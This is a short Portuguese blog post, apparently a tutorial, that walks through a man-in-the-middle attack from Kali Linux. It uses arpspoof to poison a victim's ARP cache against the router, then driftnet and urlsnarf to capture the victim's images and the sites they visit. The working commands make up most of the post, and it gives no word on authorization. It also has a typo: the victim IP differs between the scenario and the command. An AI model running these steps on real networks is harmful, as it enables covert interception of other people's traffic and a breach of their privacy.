Olá a todos
Gostaria de mostrar como usar o Kali Linux para realizar um Pentest do tipo MITM (Man in the Middle)
Vamos imaginar o seguinte cenário que deve ser adaptado a sua circunstância
IP do roteador no meu caso 192.168.1.1
IP da vítima no meu caso 192.166.1.106
Com essas informações vamos fazer o seguinte:
Abra um terminal e digite
echo 1 > /proc/sys/net/ipv4/ip_forward
Feito isso vamos realizar um arpspoof
arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
Deixe o comando acima executando e abra outro terminal e digite
driftnet -i eth0
Será exibido uma tela semelhante a abaixo onde é possível visualizar todo tráfego de imagens, para fazer um teste vá no computador vítima e faça uma busca de imagens no google.
Para parar o comando acima basta digitar CTRL+C
Para rastrear todo site acessado pela vítima digite o comando
urlsnarf -i eth0
Na saída do comando será possível visualizar em tempo real os sites que estão sendo acessado pelo computador vítima.
Espero que tenham gostado dessa dica
Não esqueça de compartilhar.
0 comentários:
Postar um comentário